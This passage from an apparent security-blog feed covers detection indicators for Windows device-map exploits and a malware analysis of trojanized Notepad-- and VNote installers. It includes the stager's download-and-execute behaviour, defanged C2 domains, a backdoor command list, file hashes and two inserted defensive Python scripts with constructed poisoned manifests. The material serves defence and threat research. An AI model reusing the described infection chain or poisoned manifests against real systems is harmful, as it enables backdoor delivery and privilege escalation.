  1707. <div id="attachment_112256" style="width: 961px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112256" class="size-full wp-image-112256" src="" alt="Timeline for the bypassing/patching process from 2015 to August 2023" width="951" height="929" srcset=" 951w, 300w, 768w, 358w, 740w, 287w, 800w, 50w" sizes="(max-width: 951px) 100vw, 951px" /></a><p id="caption-attachment-112256" class="wp-caption-text">Timeline for the bypassing/patching process from 2015 to August 2023</p></div>
  1708. <h2 id="how-was-the-patch-for-this-attack-surface-applied">How was the patch for this attack surface applied?</h2>
<p>The kernel patch was applied in <strong>ObpLookupObjectName</strong>: if the object being looked up is a file object and the call to <strong>ObpUseSystemDeviceMap</strong> succeeds, the lookup ignores the impersonated device map and uses the system device map instead.</p>
  1710. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112257" src="" alt="" width="959" height="408" srcset=" 959w, 300w, 768w, 823w, 740w, 658w, 800w" sizes="(max-width: 959px) 100vw, 959px" /></a></p>
  1711. <p>ObpLookupObjectName checks FileObjectType followed by a call to ObpUseSystemDeviceMap.</p>
  1712. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112258" src="" alt="" width="741" height="585" srcset=" 741w, 300w, 443w, 355w" sizes="(max-width: 741px) 100vw, 741px" /></a></p>
  1713. <p>The ObpUseSystemDeviceMap function checks for the SystemDevice to be used instead of the impersonated device.</p>
  1714. <h2 id="how-to-check-if-a-vulnerability-was-exploited-or-any-attempts-were-made-to-exploit-it">How to check if a vulnerability was exploited or any attempts were made to exploit it?</h2>
  1715. <p>When analyzing most of the exploits targeting this attack surface, we observed a common behavior that could be used as an indicator of whether there were any attempted exploits:</p>
  1716. <ul>
  1717. <li>Most of the in-the-wild exploits create a writable folder inside the C:\ drive, and the structure of this folder mimics the structure of the original C:\ drive, for example:
  1718. <ul>
  1719. <li><strong>C:\Windows\System32</strong> → C:\FakeFolder\Windows\System32</li>
  1720. <li><strong>C:\Windows\WinSxS </strong>→ C:\FakeFolder\Windows\WinSxS</li>
  1721. </ul>
  1722. </li>
  1723. <li>So finding a writable folder that mimics the C:\ drive folder structure may be an indicator of an exploitation attempt.</li>
  1724. <li>Copying the manifest files from the original WinSxS folder in <strong>C:\Windows\WinSxS</strong> to a writable directory and modifying them could be a good indicator of an exploitation attempt.</li>
<li>Manifest files that contain undocumented XML attributes such as <strong>&#8220;loadFrom&#8221;</strong>, or manifest files whose <strong>&#8220;name&#8221;</strong> attribute contains path traversal (forward or backward slashes), are a valid sign of an exploitation attempt.</li>
<li>Creation of a symbolic link that redirects the system drive letter to a writable directory, especially by a medium-integrity process using the <strong>\RPC Control\</strong> object directory.</li>
  1727. </ul>
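<p>The indicators above, and the two CSRSS manifest tricks described earlier (the undocumented <strong>loadFrom</strong> attribute and a slash in an <strong>assemblyIdentity</strong> name), can be turned into a small triage script. The block below is an added example, not code from this post or from Kaspersky GERT: it parses a side-by-side manifest and reports both CSRSS indicators, and it walks the top level of a drive looking for a writable directory that recreates Windows\System32 or Windows\WinSxS. The manifests, the Imprint-style directory layout and the helper names (scan_manifest, find_fake_roots, demo_fake_root) are the example&#8217;s own constructions.</p>

```python
"""Triage helpers for the indicators listed above: poisoned side-by-side
manifests and a writable directory that mimics the system drive layout.

Added example; it is not code from the Securelist post or from Kaspersky GERT.
It assumes the analyst has copied suspect .manifest files off the host and can
enumerate the top level of the system drive. All sample data is constructed.
"""
from __future__ import annotations

import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Indicators from the post: an undocumented loadFrom attribute (CVE-2022-22047)
# and a dependent assembly whose name carries path traversal (CVE-2022-37989).
SUSPICIOUS_ATTRS = {"loadfrom"}
SLASH_RE = re.compile(r"[\\/]")
# Sub-paths an exploit recreates under its fake root (C:\FakeFolder\Windows\...).
MIMICKED = ("Windows/System32", "Windows/WinSxS")


def _local(name: str) -> str:
    """Strip an ElementTree namespace prefix such as {urn:...}assembly."""
    return name.rsplit("}", 1)[-1]


def scan_manifest(xml_text: str) -> list[str]:
    """Return indicator strings for one manifest; an empty list means clean."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [f"unparseable manifest: {exc}"]
    findings = []
    for elem in root.iter():
        tag = _local(elem.tag)
        for attr, value in elem.attrib.items():
            local = _local(attr)
            if local.lower() in SUSPICIOUS_ATTRS:
                findings.append(f"<{tag}> carries undocumented attribute {local}={value!r}")
            if tag == "assemblyIdentity" and local == "name" and SLASH_RE.search(value):
                findings.append(f"<assemblyIdentity name={value!r}> contains path traversal")
    return findings


def find_fake_roots(drive_root: str) -> list[str]:
    """List directories under drive_root that mimic the system drive layout and
    are writable by the current user. The real Windows directory is skipped.
    os.access is a coarse writability check on Windows; confirm with icacls."""
    hits = []
    for entry in os.scandir(drive_root):
        if not entry.is_dir() or entry.name.lower() == "windows":
            continue
        for sub in MIMICKED:
            path = os.path.join(entry.path, *sub.split("/"))
            if os.path.isdir(path) and os.access(path, os.W_OK):
                hits.append(path)
    return sorted(hits)


# Constructed manifests for the demo (not artefacts from the post).
CLEAN_MANIFEST = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls"
                    version="6.0.0.0" processorArchitecture="amd64"/>
</assembly>"""

LOADFROM_MANIFEST = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Example.Poisoned" version="1.0.0.0"/>
  <file name="payload.dll" loadFrom="C:\\Users\\Public\\payload.dll"/>
</assembly>"""

TRAVERSAL_MANIFEST = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity type="win32" name="Example.Host" version="1.0.0.0"/>
  <dependency><dependentAssembly>
    <assemblyIdentity type="win32" name="..\\..\\Users\\Public\\Example.Poisoned"
                      version="1.0.0.0"/>
  </dependentAssembly></dependency>
</assembly>"""


def demo_fake_root() -> list[str]:
    """Build a constructed drive layout in a temp dir and run find_fake_roots."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Windows", "System32"))            # real
        os.makedirs(os.path.join(root, "Imprint", "Windows", "System32"))  # fake
        os.makedirs(os.path.join(root, "Imprint", "Windows", "WinSxS"))    # fake
        os.makedirs(os.path.join(root, "Users", "Public"))                 # benign
        return [os.path.relpath(p, root).replace(os.sep, "/") for p in find_fake_roots(root)]


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_MANIFEST), ("loadFrom", LOADFROM_MANIFEST),
                        ("traversal", TRAVERSAL_MANIFEST)):
        print(label, scan_manifest(text) or "no indicators")
    print("fake roots:", demo_fake_root())
```

<p>Run scan_manifest over copies of the suspect manifests rather than over C:\Windows\WinSxS itself, and treat find_fake_roots as a first pass only: on Windows, os.access does not evaluate the directory ACL, so confirm a hit with icacls before reporting it as an exploitation attempt.</p>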
  1728. ]]></content:encoded>
  1729. <wfw:commentRss></wfw:commentRss>
  1730. <slash:comments>1</slash:comments>
  1731. <media:content xmlns:media="" url="" width="1200" height="600"><media:keywords>full</media:keywords></media:content>
  1732. <media:content xmlns:media="" url="" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1733. <media:content xmlns:media="" url="" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1734. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1735. </item>
  1736. <item>
  1737. <title>What&#8217;s in your notepad? Infected text editors target Chinese users</title>
  1738. <link></link>
  1739. <comments></comments>
  1740. <dc:creator><![CDATA[Sergey Puzan]]></dc:creator>
  1741. <pubDate>Wed, 13 Mar 2024 11:29:43 +0000</pubDate>
  1742. <category><![CDATA[Malware descriptions]]></category>
  1743. <category><![CDATA[Apple MacOS]]></category>
  1744. <category><![CDATA[Backdoor]]></category>
  1745. <category><![CDATA[Linux]]></category>
  1746. <category><![CDATA[Malware]]></category>
  1747. <category><![CDATA[Malware Descriptions]]></category>
  1748. <category><![CDATA[Malware Technologies]]></category>
  1749. <category><![CDATA[Trojan]]></category>
  1750. <category><![CDATA[Unix and macOS malware]]></category>
  1751. <guid isPermaLink="false"></guid>
  1753. <description><![CDATA[Infected versions of the text editors VNote and Notepad&#8208;&#8208; for Linux and macOS, apparently loading a backdoor, are being distributed through a Chinese search engine.]]></description>
  1754. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>&#8220;Malvertising&#8221; is a popular way of attracting victims to malicious sites: an advertisement block is placed at the top of the search results, increasing the likelihood of users clicking the link. Sites at the top of search results also tend to be more trusted by users. A year ago, our experts <a href="" target="_blank" rel="noopener">discussed</a> a malvertising campaign that spread the <strong>RedLine</strong> stealer via Google Ads. Using <a href=";utm_medium=blog&amp;utm_campaign=termin-explanation" target="_blank" rel="noopener">typosquatting</a> and other techniques, the attackers tried to make their resources look as similar as possible to the official websites of popular programs.</p>
  1755. <p>This time, a similar threat has affected users of one of the most popular search engines in the Chinese internet. We&#8217;ve discovered two related cases where modified versions of popular text editors were distributed in this system: in the first case, the malicious resource appeared in the advertisement section; in the second case, at the top of the search results. We have not yet been able to establish all the details of the threat, so this material may be updated later.</p>
  1756. <h2 id="malicious-sites-in-search-results">Malicious sites in search results</h2>
  1757. <p>The screenshots below show two searches which the search engine responds to with malicious links:</p>
  1758. <div id="attachment_112169" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112169" class="size-large wp-image-112169" src="" alt="Malicious link in the advertisement section for the search notepad++ (left) and search results for vnote (right)" width="1024" height="352" srcset=" 1024w, 300w, 768w, 1018w, 740w, 814w, 800w, 1428w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112169" class="wp-caption-text">Malicious link in the advertisement section for the search notepad++ (left) and search results for vnote (right)</p></div>
  1759. <p>The malicious site found in the <strong>notepad++</strong> search is distributed through an advertisement block. Opening it, an attentive user will immediately notice an amusing inconsistency: the website address contains the line <strong>vnote</strong>, the title offers a download of <strong>Notepad&#8208;&#8208;</strong> (an analog of <strong>Notepad++</strong>, also distributed as open-source software), while the image proudly shows <strong>Notepad++</strong>. In fact, the packages downloaded from here contain <strong>Notepad&#8208;&#8208;</strong>.</p>
  1760. <div id="attachment_112170" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112170" class="size-large wp-image-112170" src="" alt="Page with fake NotePad++" width="1024" height="518" srcset=" 1024w, 300w, 768w, 692w, 740w, 553w, 800w, 1429w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112170" class="wp-caption-text">Page with fake NotePad++</p></div>
  1761. <p>This site offers installers for three popular platforms (Windows, Linux, macOS); however, there are only two malicious links here, leading to download pages for the macOS and Linux versions. The link to the Windows version leads to the official repository and is not malicious:</p>
  1762. <div id="attachment_112171" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112171" class="size-large wp-image-112171" src="" alt="Application download links, linked to buttons on the malicious Notepad-- download page" width="1024" height="206" srcset=" 1024w, 300w, 768w, 740w, 1395w, 800w, 1420w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112171" class="wp-caption-text">Application download links, linked to buttons on the malicious Notepad&#8208;&#8208; download page</p></div>
  1763. <p>The screenshot shows that the source of the malicious installation packages is the resource <strong>vnote-1321786806[.]cos[.]ap-hongkong[.]myqcloud[.]com</strong>.</p>
  1764. <p>Meanwhile, the second page, found in the <strong>vnote</strong> search, tries to imitate the official website of the program:</p>
  1765. <div id="attachment_112172" style="width: 1018px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112172" class="size-large wp-image-112172" src="" alt="Fake (above) and the original (below) VNote site" width="1008" height="1024" srcset=" 1008w, 295w, 768w, 344w, 740w, 276w, 800w, 50w, 1427w" sizes="(max-width: 1008px) 100vw, 1008px" /></a><p id="caption-attachment-112172" class="wp-caption-text">Fake (above) and the original (below) <strong>VNote</strong> site</p></div>
  1766. <p>Unfortunately, at the time of this investigation, the links to the potentially malicious versions of <strong>VNote</strong> were no longer functioning; however, they led to the same resource as the <strong>Notepad&#8208;&#8208;</strong> links:</p>
  1767. <div id="attachment_112173" style="width: 947px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112173" class="size-full wp-image-112173" src="" alt="Application download links, linked to buttons on the fake VNote site" width="937" height="390" srcset=" 937w, 300w, 768w, 841w, 740w, 673w, 800w" sizes="(max-width: 937px) 100vw, 937px" /></a><p id="caption-attachment-112173" class="wp-caption-text">Application download links, linked to buttons on the fake VNote site</p></div>
  1768. <h2 id="text-editor-with-malicious-payload">Text editor with malicious payload</h2>
  1769. <p>Since we have samples of the fake <strong>Notepad&#8208;&#8208; </strong>for Linux and macOS, we can take a closer look at them.</p>
  1770. <p>The downloaded applications have several differences from the original versions, and the malicious Linux and macOS versions are similar in functionality. Next, we will examine the macOS version (<em>MD5: 00fb77b83b8ab13461ea9dd27073f54f</em>). It is a disk image in DMG format, whose contents are identical to the original (version 2.0.0), except for the executable file itself, named NotePad&#8208;&#8208; (<em>MD5: 6ace1e014863eee67ab1d2d17a33d146</em>).</p>
  1771. <p>Studying the contents of its <strong>main</strong> function, we discovered that just before the application is launched, the suspicious class <strong>Uplocal</strong> is initialized, which is absent in the source code of the original Notepad&#8208;&#8208;:</p>
  1772. <div id="attachment_112174" style="width: 486px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112174" class="size-full wp-image-112174" src="" alt="Modified section of code before application launch" width="476" height="226" srcset=" 476w, 300w" sizes="(max-width: 476px) 100vw, 476px" /></a><p id="caption-attachment-112174" class="wp-caption-text">Modified section of code before application launch</p></div>
  1773. <p>This class implements only one method named <strong>run</strong>. Its purpose is to download a file to the path <strong>/tmp/updater</strong> and execute it:</p>
  1774. <div id="attachment_112175" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112175" class="size-large wp-image-112175" src="" alt="Payload of the run method of the Uplocal class" width="1024" height="430" srcset=" 1024w, 300w, 768w, 833w, 740w, 667w, 800w, 1464w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112175" class="wp-caption-text">Payload of the run method of the Uplocal class</p></div>
  1775. <p>The file is downloaded from the address <strong>hxxp://update[.]transferusee[.]com/onl/mac/&lt;md5_hash&gt;</strong>, where <strong>&lt;md5_hash&gt;</strong> is the MD5 hash of the device&#8217;s serial number obtained in the <strong>GetComputerUUID</strong> function by executing the following bash command:</p><pre class="crayon-plain-tag">ioreg -rd1 -c IOPlatformExpertDevice |  awk '/IOPlatformSerialNumber/ { print $3; }'</pre><p>
  1776. The Linux version differs slightly:</p>
  1777. <ol>
  1778. <li>The file is downloaded from the same address, but is located in the directory /onl/lnx/: <strong>hxxp://update[.]transferusee[.]com/onl/lnx/&lt;md5_hash&gt;</strong></li>
  1779. <li><strong>&lt;md5_hash&gt;</strong> is the MD5 hash of the device&#8217;s MAC address:
  1780. <div id="attachment_112176" style="width: 480px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112176" class="size-full wp-image-112176" src="" alt="Obtaining and hashing the device's MAC address" width="470" height="508" srcset=" 470w, 278w, 324w, 259w" sizes="(max-width: 470px) 100vw, 470px" /></a><p id="caption-attachment-112176" class="wp-caption-text">Obtaining and hashing the device&#8217;s MAC address</p></div></li>
  1781. </ol>
  1782. <p>Unfortunately, at the time of our investigation, the downloaded file was no longer available on the server, and we couldn&#8217;t determine what was supposed to be there.</p>
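<p>The URL layout described above (a per-host MD5 in the path, computed from the serial number on macOS and from the MAC address on Linux) is something a defender can hunt for in proxy logs and tie back to a specific machine. The script below is an added example and is not code from the report or from the analyzed samples; the log format, the inventory layout and the serial/MAC values are constructed, and it assumes the hash is taken over the raw serial or MAC string, which the report does not confirm.</p>

```python
import hashlib
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Indicators from the report, undefanged into the form a proxy log would record.
STAGER_HOST = "update.transferusee.com"
C2_HOST = "dns.transferusee.com"
# Path layout described in the report: /onl/mac/<md5(serial)> on macOS, /onl/lnx/<md5(MAC)> on Linux.
STAGER_PATH = re.compile(r"^/onl/(?P<platform>mac|lnx)/(?P<victim_id>[0-9a-f]{32})$")


@dataclass
class Finding:
    client_ip: str
    kind: str          # "stager" or "c2"
    platform: str      # "mac", "lnx" or "" for C2 traffic
    victim_id: str     # the 32-hex id seen in the URL, empty for C2 traffic
    attribution: str   # "confirmed", "unmatched" or "n/a"


def expected_victim_id(platform: str, serial: Optional[str], mac: Optional[str]) -> Optional[str]:
    """Recompute the id the stager puts in the URL from inventory data.

    Assumption (not stated in the report): the hash is taken over the serial
    number or MAC address string exactly as stored in the inventory.
    """
    source = serial if platform == "mac" else mac
    return hashlib.md5(source.encode()).hexdigest() if source else None


def scan_proxy_log(lines: Iterable[str], inventory: dict) -> list[Finding]:
    """Flag stager and C2 traffic; map stager hits back to hosts via the victim id.

    Constructed log format: "<ts> <client_ip> <method> <host> <path> <status>".
    inventory maps client_ip -> {"serial": ..., "mac": ...}.
    """
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6:
            continue
        client_ip, host, path = parts[1], parts[3], parts[4]
        if host == C2_HOST:
            findings.append(Finding(client_ip, "c2", "", "", "n/a"))
            continue
        if host != STAGER_HOST:
            continue
        m = STAGER_PATH.match(path)
        if not m:
            continue
        platform, victim_id = m["platform"], m["victim_id"]
        rec = inventory.get(client_ip, {})
        expected = expected_victim_id(platform, rec.get("serial"), rec.get("mac"))
        attribution = "confirmed" if expected == victim_id else "unmatched"
        findings.append(Finding(client_ip, "stager", platform, victim_id, attribution))
    return findings


# Constructed inventory and log lines for a stand-alone run; serial and MAC are made up.
SAMPLE_INVENTORY = {
    "10.0.0.5": {"serial": "C02EXAMPLE001", "mac": None},
    "10.0.0.9": {"serial": None, "mac": "00:11:22:33:44:55"},
}
SAMPLE_LOG = [
    "2024-04-22T10:00:01Z 10.0.0.5 GET update.transferusee.com /onl/mac/"
    + expected_victim_id("mac", "C02EXAMPLE001", None) + " 404",
    "2024-04-22T10:00:02Z 10.0.0.9 GET update.transferusee.com /onl/lnx/" + "0" * 32 + " 404",
    "2024-04-22T10:00:03Z 10.0.0.5 POST dns.transferusee.com / 200",
    "2024-04-22T10:00:04Z 10.0.0.7 GET example.com /index.html 200",
]


def demo() -> list[Finding]:
    return scan_proxy_log(SAMPLE_LOG, SAMPLE_INVENTORY)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

<p>A hit whose id does not match any inventory record ("unmatched") still deserves a look, since the stager may hash the identifier differently from this assumption, or the host may be missing from the inventory.</p>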
  1783. <p>However, we know for sure that this server has another subdomain, <strong>dns[.]transferusee[.]com</strong>, and it is accessed by a Mach-O file named <strong>DPysMac64</strong> (<em>MD5: 43447f4c2499b1ad258371adff4f503f</em>), previously uploaded to VT and not detected by any vendor at the time of the investigation:</p>
  1784. <div id="attachment_112177" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112177" class="size-large wp-image-112177" src="" alt="DPysMac64 file page on VT" width="1024" height="663" srcset=" 1024w, 300w, 768w, 1536w, 541w, 740w, 433w, 800w, 1881w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112177" class="wp-caption-text">DPysMac64 file page on VT</p></div>
  1785. <p>Moreover, this file is stored on the same server from which the mysterious <strong>updater</strong> was supposed to be downloaded:</p>
  1786. <div id="attachment_112178" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112178" class="size-large wp-image-112178" src="" alt="Loading DPysMac64 from update[.]transferusee[.]com" width="1024" height="144" srcset=" 1024w, 300w, 768w, 740w, 800w, 1431w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112178" class="wp-caption-text">Loading DPysMac64 from update[.]transferusee[.]com</p></div>
  1787. <p>From this, we can fairly confidently assume that the <strong>updater</strong> is an intermediate step that should ultimately lead to loading <strong>DPysMac64</strong>. The server also contains a file called <strong>DPysMacM1</strong>, the name of which implies that it is built for systems running on Apple Silicon processors; however, in reality, it is the same file as <strong>DPysMac64</strong>.</p>
   1788. <p>The application is a backdoor, very similar to the so-called <strong>Geacon</strong> – an open-source implementation of the <strong>CobaltStrike</strong> agent written in Go. Although the attackers removed any direct mention of <strong>Geacon</strong> from their project, we found a large number of strings, names, and code fragments of functions and modules matching the implementations of <a href="" target="_blank" rel="noopener"><strong>geacon_plus</strong></a>, <strong>geacon_pro</strong>, and <a href="" target="_blank" rel="noopener"><strong>BeaconTool</strong></a>. For example, they have almost completely identical <strong>sysinfo</strong> modules and the functions <strong>FirstBlood</strong>, <strong>EncryptedMetaInfo</strong>, <strong>PullCommand</strong>, and so on:</p>
  1789. <div id="attachment_112179" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112179" class="size-large wp-image-112179" src="" alt="Comparison of the list of functions of the sysinfo module of DPysMac64 (left) and an instance of geacon_pro (right)" width="1024" height="243" srcset=" 1024w, 300w, 768w, 740w, 800w, 1143w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112179" class="wp-caption-text">Comparison of the list of functions of the <strong>sysinfo</strong> module of DPysMac64 (left) and an instance of geacon_pro (right)</p></div>
   1790. <p>The backdoor has two launch options – normal and as a service. Communication with the C2 server <strong>dns[.]transferusee[.]com</strong> is carried out over HTTPS. Interestingly, the attackers named the project that implements remote command execution <strong>spacex</strong>:</p>
   1791. <div id="attachment_112180" style="width: 658px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112180" class="size-full wp-image-112180" src="" alt="The name of the backdoor module contained in the lines of the DPysMac64 file" width="648" height="448" srcset=" 648w, 300w, 506w, 405w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112180" class="wp-caption-text">The name of the backdoor module contained in the strings of the DPysMac64 file</p></div>
  1792. <p>The backdoor contains the following list of commands:</p>
  1793. <table width="100%">
  1794. <tbody>
  1795. <tr>
  1796. <td width="10%"><strong>Code</strong></td>
  1797. <td width="30%"><strong>Name</strong></td>
  1798. <td width="60%"><strong>Purpose</strong></td>
  1799. </tr>
  1800. <tr>
  1801. <td>25</td>
  1802. <td>CmdSSH</td>
  1803. <td>Creating an SSH connection</td>
  1804. </tr>
  1805. <tr>
  1806. <td>27</td>
  1807. <td>Spawn</td>
  1808. <td>Launching a new agent</td>
  1809. </tr>
  1810. <tr>
  1811. <td>32</td>
  1812. <td>CmdExit</td>
  1813. <td>Shutdown</td>
  1814. </tr>
  1815. <tr>
  1816. <td>34</td>
  1817. <td>SetSleep</td>
  1818. <td>Entering sleep mode</td>
  1819. </tr>
  1820. <tr>
  1821. <td>1010</td>
  1822. <td>Screenshot</td>
  1823. <td>Taking a screenshot</td>
  1824. </tr>
  1825. <tr>
  1826. <td>1020</td>
  1827. <td>ProcessList</td>
  1828. <td>Getting a list of processes</td>
  1829. </tr>
  1830. <tr>
  1831. <td>1021</td>
  1832. <td>ProcessKill</td>
  1833. <td>Terminating a process</td>
  1834. </tr>
  1835. <tr>
  1836. <td>1030</td>
  1837. <td>PortScan</td>
  1838. <td>Scanning ports</td>
  1839. </tr>
  1840. <tr>
  1841. <td>1031</td>
  1842. <td>Install</td>
  1843. <td>Adding itself to the list of services</td>
  1844. </tr>
  1845. <tr>
  1846. <td>1032</td>
  1847. <td>UnInstall</td>
  1848. <td>Removing itself from the list of services</td>
  1849. </tr>
  1850. <tr>
  1851. <td>1040</td>
  1852. <td>CmdHashdump</td>
  1853. <td>Getting the computer name</td>
  1854. </tr>
  1855. <tr>
  1856. <td>1044</td>
  1857. <td>CmdClipboard</td>
  1858. <td>Reading clipboard content</td>
  1859. </tr>
  1860. <tr>
  1861. <td>1050</td>
  1862. <td>FileBrowse</td>
  1863. <td>Getting a list of files in a directory</td>
  1864. </tr>
  1865. <tr>
  1866. <td>1051</td>
  1867. <td>FileDrives</td>
  1868. <td>Getting a list of drives</td>
  1869. </tr>
  1870. <tr>
  1871. <td>1052</td>
  1872. <td>FileMakeDir</td>
  1873. <td>Creating a directory</td>
  1874. </tr>
  1875. <tr>
  1876. <td>1056</td>
  1877. <td>FileUpload</td>
  1878. <td>Uploading a file to the server</td>
  1879. </tr>
  1880. <tr>
  1881. <td>1057</td>
  1882. <td>FileExecute</td>
  1883. <td>Executing a file</td>
  1884. </tr>
  1885. <tr>
  1886. <td>1060</td>
  1887. <td>FileDownload</td>
  1888. <td>Downloading a file from the server</td>
  1889. </tr>
  1890. </tbody>
  1891. </table>
  1892. <h2 id="connection-between-infected-applications">Connection between infected applications</h2>
   1893. <p>While we cannot be certain about the files previously downloaded from <strong>vnote[.]info</strong>, we have discovered that the sources distributing applications on both sites are the same. It&#8217;s also worth mentioning another interesting detail that we found completely by chance during the examination of the modified <strong>NotePad&#8208;&#8208;</strong>. Among the strings of the executable file, we found text resembling an <strong>About</strong> window, but instead of a link to the official project website, it contained a link to the suspicious resource <strong>vnotepad[.]com</strong>. Below is a screenshot of the <strong>About</strong> window in the program&#8217;s user interface:</p>
  1894. <div id="attachment_112181" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112181" class="size-large wp-image-112181" src="" alt="About window of modified Notepad--" width="1024" height="580" srcset=" 1024w, 300w, 768w, 618w, 740w, 494w, 800w, 1456w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112181" class="wp-caption-text">About window of modified Notepad&#8208;&#8208;</p></div>
  1895. <p>The link in the <strong>About</strong> window led us to a stub page:</p>
  1896. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" src="" alt="" width="2298" height="542" class="aligncenter size-full wp-image-112235" srcset=" 2298w, 300w, 1024w, 768w, 1536w, 2048w, 1484w, 740w, 1187w, 800w" sizes="(max-width: 2298px) 100vw, 2298px" /></a></p>
   1897. <p>We found it strange, so we tried switching from HTTP to HTTPS, which revealed that this site is another copy of the <strong>VNote</strong> site, similar to the one we saw on <strong>vnote[.]info</strong>. Furthermore, when opening this site, the browser warned us that the certificate it was using was invalid because it had been issued for <strong>vnote[.]info</strong>:</p>
  1898. <div id="attachment_112182" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112182" class="size-large wp-image-112182" src="" alt="Certificate used by the site vnotepad[.]com" width="1024" height="453" /></a><p id="caption-attachment-112182" class="wp-caption-text">Certificate used by the site vnotepad[.]com</p></div>
  1899. <p>This indicates a definite connection between the two cases described, as well as the high probability that the purpose of the modified <strong>VNote</strong> editors is similar to that of <strong>NotePad&#8208;&#8208;</strong>, and involves delivering the next stage of infection.</p>
  1900. <h2 id="conclusion">Conclusion</h2>
  1901. <p>We&#8217;re continuing to study the threat described above and are searching for intermediate stages that have not yet been discovered. In addition, we&#8217;ve established that the changes in the Linux and macOS applications are identical, suggesting the possibility of a backdoor for Linux that is similar to the one we found for macOS.</p>
  1902. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1903. <p><strong>Files:</strong></p>
  1904. <table width="100%">
  1905. <tbody>
  1906. <tr>
  1907. <td width="40%"><strong>MD5</strong></td>
  1908. <td width="20%"><strong>File type</strong></td>
  1909. <td width="40%"><strong>File name</strong></td>
  1910. </tr>
  1911. <tr>
  1912. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">43447f4c2499b1ad258371adff4f503f</a></td>
  1913. <td>Mach-O 64-bit</td>
  1914. <td>DPysMac64</td>
  1915. </tr>
  1916. <tr>
  1917. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">00fb77b83b8ab13461ea9dd27073f54f</a></td>
  1918. <td>DMG</td>
  1919. <td>Notepad&#8208;&#8208;v2.0.0-mac_x64_12.3.dmg</td>
  1920. </tr>
  1921. <tr>
  1922. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5ece6281d57f16d6ae773a16f83568db</a></td>
  1923. <td>AppImage</td>
  1924. <td>Notepad&#8208;&#8208;-x86_64.AppImage</td>
  1925. </tr>
  1926. <tr>
  1927. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6ace1e014863eee67ab1d2d17a33d146</a></td>
  1928. <td>Mach-O 64-bit</td>
  1929. <td>NotePad&#8208;&#8208;</td>
  1930. </tr>
  1931. <tr>
  1932. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">47c9fec1a949e160937dd9f9457ec689</a></td>
  1933. <td>ELF 64-bit</td>
  1934. <td>NotePad&#8208;&#8208;</td>
  1935. </tr>
  1936. </tbody>
  1937. </table>
